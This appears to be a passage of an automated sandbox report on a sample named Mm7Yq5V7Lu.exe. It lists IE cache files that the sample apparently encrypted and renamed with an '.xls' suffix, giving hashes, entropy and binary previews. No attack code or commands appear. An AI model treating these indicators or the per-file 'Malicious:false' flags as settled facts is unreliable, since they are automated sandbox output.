                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8528
                                                                                                                                                      Entropy (8bit):7.8885727060648065
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:wZfMl3t6mgsdBIWgK5nTt9D4VZN1FwCosFo4X:wit6XlWn5n3sVZnbFo4X
                                                                                                                                                      MD5:5E77790C3FC317AA17E7AE10F3D30F6E
                                                                                                                                                      SHA1:390BEB2438B97C601E160AA59AB4A3FF775E1817
                                                                                                                                                      SHA-256:9B67DC7086B7BDDEB7B080EE7CAB3CACE069FC83CE552C186FB3516DC3BA66DC
                                                                                                                                                      SHA-512:1959DD266A63EB8DA0742C2FDC2245238B72033D06B9A33DDD5ED27A0A38BBCBC10F62B6DDBFAA7284A2D2AD9688B56EF1F4122EF63327A3AB3FB32F22859B7B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .o.....C'hD...G....u...= h.......J..P.w..>...t..TYUoA.u.).g.Q..H....|%4.X..I.....GD3..|frl..l....6D)D.o.8*...z...=`.....p|.$. ..N7.^X.i.'yG......JS..D..iu..S..k'MU`...)J...('a./%9...S.X[!.u2...5Y....)...b...........M. .x%t.\.ml...P#..!.A..<e..y.D..$.*.3...`u....*..."...v-.a(.@.*.v.j=...A`.v....E.}l.)(..CH....v...L/X......sl.....HY....z@..=2).3"...{.l2...F..~..K....2>...jF.g....6....}-..h.......ib4.+...A.8..y7..n=..W/......2h.J=.jwR|..I.P.}.....y..@..?.._+|.I.K./.hc.S9..c.V."..o.w%.L....H..LL.p3..rx[g._..+g....=k^).T....-..R.G....2..aG...8f......>..'h.K......}.i'?j.h...L..`......L:...>.T.....P.R.M.`.Od...8>A"}.0%Jy...]^...MN.i2.:..v+g......p7.~9..2.0t.F.......lwM{..*.U...M..0...=..y......|.[..jMP].s..T....Ow....K....r./l.52,.!b9$...}./g.'....1.7Q.<.V|...|.x.H@..nW$...?Y.&}..}..$V....C.....S.........T...xx..>9..../.1q."1.......u..C...6.[`&r....s...>6..1.:2...rr..M..E..[1.t*.8*5.#...i.|yx.),.7....-..y.7..A=0......_...{...)Ed4...F...'..1rO.G.r"R.D.c.
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BBVuddh[1].png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1248
                                                                                                                                                      Entropy (8bit):5.9677968337094125
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KKgtjd/bMgaLI7MEJEK2lzK8sevWAVgKTaCB7RZ0cHYIgtyUzwwfT:KKOd/IgaLJEOLzCwgck38G
                                                                                                                                                      MD5:E1027E22821A95565A2DD0F17BB43EBE
                                                                                                                                                      SHA1:8F3A23A00A0D723034359C7CF4D66F13D0604281
                                                                                                                                                      SHA-256:2AF1CEFCC8D428108592A511CB15739BCB6911CB53A513AAAD42E78E194EB9D1
                                                                                                                                                      SHA-512:392B638306DDE1B0799E8C52F1791EB69706ABBC34533167E0ECF3A8CBA19A58403BA15AD480D30E9F54010C1198DE2AD2761287A6B9AD4D76DCBA10F71E8607
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: E.,.N.4..M.v.-Z....p).L..h.(..h..2..(...x..u..HT-4.6....6n.G...b...8.Q......f...~.%.<L`@... P.S1..8O..po...."....)D4.....gl.MS..pf[.n6.|7...U..T.A.N..(.~.._y...9...2#..`.Qy.T....{.G.zL2.._Z.f.m.x2..Y..k..K..2.!..1|..R.G...\dv...J...x......@....oXxI+'..0....Y...g.dUO.;q).......%...C._Q+q9^s.fo.J.Z.....P.'........_..d..m.cs|6A.S.Q.i..F...6...B.}....k.v.+m...|......;OKs...a1B..4...\..b...K.faZ.a..<....6.$....67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\BBnYSFZ[1].png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1504
                                                                                                                                                      Entropy (8bit):6.475667608916024
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QFqvRz1evVsdgGF4VWNTcVuoGPgb3BE2BjzK8sevWAVgKTaCB7RZ0cHYIgtyUzty:pREdsdhuWZcAf4RE2xzCwgck38t
                                                                                                                                                      MD5:7F4F582FC70A63FBD5D822FAA2D65969
                                                                                                                                                      SHA1:8ADA40191A306F21A6F8D4263276EDF4327170E7
                                                                                                                                                      SHA-256:72107E9549E6E67588A3D41C8D93C7FECC73653CCA5B8C385538663982430564
                                                                                                                                                      SHA-512:0F132D89DBA4BE7EE87554FFD8A330CBA6EAE9D89D8AC5586AC888160DF0B5E3D18A18B36EFD6B716CAB5E91B8ED14AAF70928595349360E1B0CE897F2D25235
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: $.G....l*.3.+vl.&.P....z.l.|.hh$.Q.C,G...._4..$.@..j$.8;;&.}*.$.2Y......|][.{.._..b..v..p....uO.*.S.E:c...kK..L4FV..5.O.L...n3......|>...L,.e.K..2.#....3.....NxD.0E......G.....f..).=..GE%..O......(H..IZ....L0*_........oH<..E.......]....Q.l.I.jmHj.d._..D .p.a.G...7..{U........#/...i7..m.\...-..TD.L?K.......A.|.A56.....}.z.....)/e.?G.X!_.>.....K`w.M.E...v....6V.s*..b0....AqB.c.Q..l.....sx..h...K.h-I..;z..a..u.7B.e.$1ca......m.Mo#.)$E....#............`.......C}5...J.%....4...h0=>kw-..Q...4."..s...7... )c....\.M.d%..(.$.W4..O...+..pJ7..+U..9.....I...g..c..S.j.\,.$...kz...Z..ZA..D$..wC..D..G)..8..Q..r'*.3.V8..Z..R...<..-.d..h...3T..jO..:@t..y.zq...p..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\Dky0EFi_5HFU5i3GtxYP0GoDJM8.gz[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2896
                                                                                                                                                      Entropy (8bit):7.412121351479477
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:DEdBZsd3ZTUW7FFUVfytHXiwpu6NBMpMhIOEbDw6Y2d9JN8p2szCwgck383:gAZj7FF8f2qWBOAI5c6ZXqp2szTEw
                                                                                                                                                      MD5:2B45A7EE3E3C736F71363029D8D7CA29
                                                                                                                                                      SHA1:E4F0C8D47F48EA2264A8E7B8AAA941BDC1D1C781
                                                                                                                                                      SHA-256:1523ABC7471492C638D5F6EF921760C11D361C033DB903F6C74AB66257C63955
                                                                                                                                                      SHA-512:ADD6008AC167B05019713FECD8712EC52D2126635C89DAD5C96176B68C2DB76468A711A66C06335E84252E12D7722C08E8B91169E822D1A50C5B3DF721C1E818
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: #a....?...[WK..f&..E~mE.t(.B....|...~^9.."...z....FA........a.{.8Di...M.F...0......F8. S_..k+E........W..J..M-....,l7.Y...l..dK.z.....:."OX........H.jr.....f.......&....c.#u...z<..F.P.T#.X-.u.....|$.t.u.G....H..K.....ze........((..t@,....u ...).>."..r-.C.\M...).A!N.\S...2Atz.~..5#....Ap...o.6.2...l.K~=.p.FP'.pj..K..5C+.}.....z...'..T....../..K..p/....Z;.7...1U.X.uS,..t.D.%...t.c.b...3.\..R.EM?.6-.h`>_.8.(=c..F..l.I..J..}.9{d......{M..L*Rr.:d..k~Ip{...T..W/.A8..."vZ.........K.S...P...`S..6.4%..3d.....li.(...rL.&~1.....U.a.^....._!.2.2.~n......w(t.Q.>..\pv.$.6.I=:d.}..u-B...2..*.._.......ZwP..zJwL.....F..*M.C\}..h.Jb.l.9.&.....y9.h...kk.H.../#.t..S...6.......8.V...t.LrX.S..t....%.Z......\r..Q/,*J..@../...x..R*.F}.t.....B)...u.......).... .......6.X......GS.?.(..a.vS._G...uME......Z...V...Q.'.2f>.....~./..A?.v...l.g..PI.3.......~gt^...B..HG0...FP..&Q..L.....=C.....\...!......:o...F..&_u.?...*....T...2o/.ir.....=.&Q.A...ng].#|Ea.bX<.F.........
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\JUCQd3FzWGRzRrfSjqQSc7PHhBs.gz[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1504
                                                                                                                                                      Entropy (8bit):6.461232847169331
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8pZA4xgDxZOBR5Na92QHBsV7QOJpQzK8sevWAVgKTaCB7RZ0cHYIgtyUz5/e7:agDxZeNaUQHBwhJOzCwgck38uS
                                                                                                                                                      MD5:B0BE75B6D0D6732E3CF7F9079E77DE47
                                                                                                                                                      SHA1:8312143EE0AFEA3315ABFAB572730E9B3E132667
                                                                                                                                                      SHA-256:546094E2D59F2F82891CE554F38269188148E134FDE7B28DD55F681251D06845
                                                                                                                                                      SHA-512:D7241140BF68D8ADB505367545F0BDA6415C0A7790A3E4CC3E49A81FF4F8C26A7FD52980B8C38EAD0AAE2ED38DD7F8126DADFEBC1AB37354DF52D1C6A4008784
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .>.ni....=G#...%.O;..np..fJ;`Ca.I...d..aOUH.gz..5..*.A....BK.> .!.....m2P.......6..[..o..T..=m...!....g?9.f4......C,..i}....N.Y..{_*.<_.q.U........9..i..~Y}.&...n.....i.G/.h..|b.Y..Y.5.k-x.P.1...dy.D......C...,s.e..k.....X`.Af.*...g..m3.-2....B+X.?O..N/3'.S<...|.w&..Y...I.SM,..H[.Q..5. ..n.~....o.fZ.Y...Nc..q....w....."...Q.o?.'.'.m.....S.B...c...tS.."..@.<!m.>2/FFlx.cN%.h8.....&....EZnF. .a/...?......9.g.........M|.mn..[.MX&.0'.*..t...(. )..3.....'.W.:...#.9.-...!.I.J3.....9.`x...z....Pn_.....o44c~..|.i}..Ji.9].6!d..ri..Vc...p%....[0....Rz.UL.E].i.b.....WkUr..A.}.?7f....P...H.....T....k8..g........!|...:..:.w.l_. .r.....b..Oc.r..[...9f.E67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\MWF_SocialTwitter.png[1].svg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1792
                                                                                                                                                      Entropy (8bit):6.850434910645087
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:xn6tFKScU5ZyMbeYmi9ckD+zCwgck38Wm:l6z+U5YMbrmi9DSzTEDm
                                                                                                                                                      MD5:A2BE810D61F4E26D5137B301CBD3884E
                                                                                                                                                      SHA1:8E6137F5076C8AB4C955DC976D256B39749647CC
                                                                                                                                                      SHA-256:B7E8B90A2AE946739DCA598A6C6D3C8C3E0AA75930B62DC799764A0F9998C0FA
                                                                                                                                                      SHA-512:9B3427607F8510EFDE0C03D998D33EE44C8146CDB1A0EDE1B87FA2E6EFECC5397902C76508FA3A21A1B633B9107A2E22E0791B18F47C82DF8521B3AD347AC864
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: }Vk.............I........-X0..Us.M..4.a.Vs.+.#._.iC......%.r.F.....5p.....C.q.....>:.J7......A#.j.N)..e;..........~.....Qk........Y......&e.N2m.......t.$d.;.tn...0K....|...Q...V......0....0+.8.."vL..#..csV..i.I.Q=.8..E.h.n..$.E...J...G.b..q.1k..m.jd>.y\B...<.5..(.r{.Wr.....o.$Sh.1....8g.?...Ce..G....Wn..Q..dV..N0....U/.f*..v.......a.t#Ds...Z.7N....\X:=..0..E_...w).2.-kE:..I..H6.]J..=.F..p.d..>uT...hGqs[{+..?.w...../f.R.......D...Zs.DKv...Iw.^.a.........o.c.F..ki.-.....B.y[.M.u]..5.mw#..J.H. Z..hn.}..A........&k.w.....^*...'3/&...:..W.../c.amN_.q....H)....\..Oh.......Sp....}.....ng.#....!......8...(.pd... $.u..z..-.w..a.f.6}....|r.}.w.<8N.%p....v)..s.y!:.Jn..Cr%k..!..1.(....#O.&..@Z^...3..?.I..'V.w..^_ ..TB....Cjc}..1;@..H.....N......D.&...T.?..~..rU.f..o.m......H..b.....C"...TK.4........J}+Q.w1H.<....Pws..XS.?...;.w......}.n!<....P..n.S.Y.9..1uT....8....3..3.4..U...N.NH...x.+.\..l.L..Id3.U..H.....bP1....B'..&.Y..a...6.67 0D B5 3D F6 72 46 45
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\Passport[1].htm.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1264
                                                                                                                                                      Entropy (8bit):6.00911782961931
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:XCR1zodY7bhc/gkSoRXtf+tcoVkFzK8sevWAVgKTaCB7RZ0cHYIgtyUzuJgN:A1nfe/DSoRXstaFzCwgck38rI
                                                                                                                                                      MD5:D5F06FC7CCFDE279E833E13B7D085983
                                                                                                                                                      SHA1:E034E5B479B261588E84B100F267FA77701F0403
                                                                                                                                                      SHA-256:5C8B570AD7AD704FC7E2B56D82DCAF0745A1C12717CB51A0D443E36E975B1DB8
                                                                                                                                                      SHA-512:A4E0AB154C925CED2F972FCABADADE85FAFDED5238A0E5A739CB813DE0D0ADADCD468125A490791273C8AD31E9C35300CAB64310BF3B8E4B26D83D2265321130
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: `.7..%.+...:.y..>.r.j.F..B}2.....W.....E..+K.(>..3.^.u.._.M..,DD...TD....Mt..j.....A93...G.....([..].BX|.u~f}.....7NmU.Qnrw...g.P....k4~...r.So..u..c....B.E(P....vu..._.h.X..5.~.......Fd.:....P...En"0...,)...2 ..R..&?.....t.sv....i=Ty.......O....).".K&RE.U.5....<.J..>=...2.%.].pI.......]......a[=..,5.R.u_.e.b...m...z.....:S....{[.8..%M.^M..{)...2.,R.p:..y".BM..$........;d%R.iV.....|.'"^...u....S.)...7....D.5nf.Qx+<<b}M67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\a8a064[1].gif.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):17304
                                                                                                                                                      Entropy (8bit):7.694588955336204
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:78UO1j/8jC4jYphEccys4AeP/6ygbkUZaoGBfR:AfUjC4j+hEc/s4Ae36kOaoGZ
                                                                                                                                                      MD5:021086DF022145E7AB1E9CFF8430686E
                                                                                                                                                      SHA1:0A592DE7F492C06830B9783D256B2FB1257E654D
                                                                                                                                                      SHA-256:2ADFD6AF585B2B3F517DD6008A691F8772B73503A429963123CC102A8A2B88DA
                                                                                                                                                      SHA-512:8EFF22188F56DAB2F622BF64825DFCCB4325BEF8B6669368B2B0A78F0D7A2A3BA452C1AA3E7CDE782A1375A9F4D7CA5CABA903EDE93B73B38D008367E7CF72B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...I&....bH<...W%....<.}2.h.....d..l.5./{......{.....q7x....p6...+....[..L..0...i..&X..PC"..;.P....`.p.-..i.=..S.L.. ..Z...n..=..Dv|7.%...%..1..ht.$..I...].u9....E...q.......n.7..i.5XJ.>O...g.....A.On.@..h.M{&..B .:@).R.38.../j...^].}Z..*)|+...\..O.]..*F......*.c-j....|...>.....p.jY+.ff.fv.!#.....#.........!...y,..;.....}@@..k...)#O`.a..' vkDdU.^.9...[z..yX_....A...X..9...@...[.-...?2{....va.-;mZ.c....?A......v..e..1+h..V..x......D....@...I...g.Q.y)..t.......K9p...2f....p.G.1.9kH.G..T....y..&l.......x...u...\...U.....h/h...;|....a....LQ.`...g..!.rP...!.vd.....G.l.&..?.*.w.y...Un....KO....K...*.d.o.V.n...B.?..{..Bl..R...{......f+...l.,.Ig.e.v...e.I&...`.*1pO...%.......g....W....0_*.4.i...........Dj..X1.l,.x.o.W.:G...17....l-....n........=..?...~..%\.~.'0.J.....2.O.c..S.)...A... .d.D.....x...&%.H..^.+a....'.K.:..?...L...z.e..r.j,..3...;v.@...o}........9..,....I..8........'AY.>.n..r..a.........i.R.....O~@....?..m_W....o.dfo.._i..
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https___www.google[1].htm.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1312
                                                                                                                                                      Entropy (8bit):6.144276393810973
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:cwVOgxIQXrX8+deObHt1nyNL/PzK8sevWAVgKTaCB7RZ0cHYIgtyUz+O/g:cw7XrX8dAjnerzCwgck38G/g
                                                                                                                                                      MD5:B9C2B19D0AAA5C40A0F9025466589167
                                                                                                                                                      SHA1:A82ECD41975A8964B0BCA6EE2A0E147002497B89
                                                                                                                                                      SHA-256:66DF5A2BB341C68D1C14774307D26BB7C7565964A615FF00E2960D0D02D4794D
                                                                                                                                                      SHA-512:8403648E6D1184FCC194C28E29B0DB92C8E5FF2DDD21EC059C583766ADC402C48AF4C6B1F77AB11DDF8DA3F3B93826D6407C1105220D51111CDD489AA5C63234
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...8a3...x.<...U....#k...D...>..4....X.q..a}..+.M9e...a;@t.S.Z ...[.)R.k!.rAK....b..*p...z...jB....ND...B..mK.)I>..+......7.E.f.N...G...3......Y..d.s....Y..9sR.dDk.....#...:..X...T?.N...e].<..OJy..3.....f..3.@....r~..;....X.&.d|Dh....2V.5....P.r.e../iJ#.6....B...R4o2I%..`..'=nY(X.P._.#x_.'.......Uh.'hFj.1;*g....&:...5....L.\b........s..4....5..Ua.o. %../.8.m......PwP....b..k4..M..tUP...2..m....T....'e......7.....tS...D?.vt.Et.o..w... ...GN."%..L.:.<...R...I.ij.|..K67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\animation.gsap.min[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3360
                                                                                                                                                      Entropy (8bit):7.553937524884783
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:REoxygMsfPln9vqyqoOR7O5+evCxmsNUL5RT9Pc1eOoNXfD7Ov3zCwgck38C:RELgvU7N2vCxmNtRT9P7LfDQ3zTE9
                                                                                                                                                      MD5:B1F6CA67B4F95292D91E9B001A4EA6F6
                                                                                                                                                      SHA1:F8C37DF576FD16BF27EA117A5F8728F19283C6AA
                                                                                                                                                      SHA-256:0112EAF1CBEEB055E81906B169CEA77BB55AF943F4DE6180BFAE6D4390D71DB9
                                                                                                                                                      SHA-512:F5A53925E5FD22282680F3BF8FCAC8455D51A99C2D6467454ED36A81CB2607F76177C4CCB7A683976F6FBBA6FFAF60F5EFCFC636FEA97BB5125B894A012D7D96
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..q._S..;.x.i.."$..{.j^..cs...,.g....|...5.,..H7...~g].....T...B:.......i..^..t...}0.Z.U...U.mC.\.k"..i....#n.>N...'v...:y.(.l.3.P...v ..{hh/...$.^L...........j..8'V8...l.D.t...;.<.....`..+n..3..b..wb.@/3.R..ucL.{R......18q..>...b.N."....G.......A....:.H..f.t.. .......DNy...my.c.f..%.&.......^..h....]0...+j.Y....."&...9B.Vp... ..,..x~......a.lf.. 8.G.u...\i....V'o..Q3...K...{.......R7.....Q...G..Mo.6..Ip.4CN........VG/9t....X...7..C...-2..p..g...t.JX..U.B..Z...4).P....jT..B..`..s.uQ......]|M..L....!u..Y.......c....e.7l~v...!1Wn....r.wC...0.a..-.`._.e...4..:.....~..|.....L.V.E...."y.K...s.;.....A?.}\..C.....:l...2Wr.`...).l...8..M....p..0...z....n.Sb{Z<...fs[D/....g...D......V..rWQ.74.-.W.Kz^}....;..pn...M}Y....c...~...5.La....[...$0..U c.`..aPy..2o.^._.H6..z{\.7.$...A.Q..U.F..a.].'G..R&.H.c..!.F.'.%"m.LN2.%...G.)..f.k....^..VaO...M..\....U...(.\..Q^..VO..3.$........Q+..zl..NU]...x....^:~qw.)g..K 6.p,..b\Q@(6g.Wk=C.D...!.om:....A.,.
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\autotrack[1].js.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):26191
                                                                                                                                                      Entropy (8bit):7.580560612375226
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:k+0IV8ZdwmRqZg5NnrQi7xD21qT8sqXrF1Iiq:ktIV87BqYtrQi7xD21qT4XrPIiq
                                                                                                                                                      MD5:550EDDE460C516B046D0E9AEB61DAC3C
                                                                                                                                                      SHA1:2B8E4C705D2D72CFF879B1F28B5410F2129CE86B
                                                                                                                                                      SHA-256:B069ACDBE965BAA78B98EAB2B6D2A38DDB487BE885FD028167A629DA6EDD68B9
                                                                                                                                                      SHA-512:9C3CC85D767FC80DA571AD789B47DC6C51D1F8963599CB554BFFDE8D896C267A7B5542A3189A099F05EBDC73AF5BA75223B4F6B7545D761796100B0EB8DEA1B2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....=oxo:..s.M8k..jW/. '\p....AQJ..(0R.v.c.`...m.&..l..V.G..V..B].*....z...u..{.....9M..IJs....Tl^.tjp.[....O.r`.S..e|.i.,0..../.@..$4.e....."'g.{..1%z.O.K."P.;R..Tt../3....\.:...m..X}.L."..1hH.g....`.d`&.I..;o.jX{.n..2p=....GUW.0.,:2...x....:..\ ..%..6h.5.PT..{.@.!,..A..g.H..H...Ia.-..\O.]m..s..h.c.W.)l.. w..J./.F...Y..mG.&p:Du.L.}.......+...J.Y..q..2........9o.E.:.&...<q.7.1.S.....=.Q....L$l[..xv.J)..Xw..N......\<......I..$.&...j.P*.Wm...A...Eb=R.+..:4.....3..^.....s.j.u;l..Rg*K.......!U-..'...o'.U...#......1B..Q........xd....3...~..h...y..\'.67x.[...z4....d%6.t.....l.....+.......-.z.#.e.s.j..>...y.0{As)a.zH.m...S.v7yO.q..Q......{..i.X........Q.%,..x...}.......q...K9nT.C]\...K....Qj.uPk.K.}...Y.Y.......F.[!z.um.@U.W...b:...s....(...MB...b3.i....Z....j....s.a..;.R.|.....U.|U.O.br.".ho.....t.b..{.~W.R.Jkr.I."..p....V.<)..+lz.C.......J...#...*...L..L`.t.N.^.\.J........\4....N%..)E.wF.....(W./.....M...........qfip5....O.6."hqW2
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\IE\X2GCHJOK\checksync[1].htm.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13548
                                                                                                                                                      Entropy (8bit):7.557928413102552
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:uAztWs2hZRYNGXcGjB5hNFkCWQWwY4RXrqI6R:Ttv2hZRYNGfhFkCWQWwY4RXrqfR
                                                                                                                                                      MD5:E105792592A04D404E8590C0A1491905
                                                                                                                                                      SHA1:2D8592E7F7BC4F6FC29F32317720E99CA70B4994
                                                                                                                                                      SHA-256:5C50F94D139F4E7128242E25E4E795CF9EF9F0B991EA3BEEE7203A1228D0C59B
                                                                                                                                                      SHA-512:2A95F207579EB1A0C35B212AF1D447507C370E0DD7916EB092352FC535603DA7BBB7AAC2C0FC3AB2776B5E1C570C17E90FF3ADD0B4D21F00D1E8D89132590964
                                                                                                                                                      Malicious:false
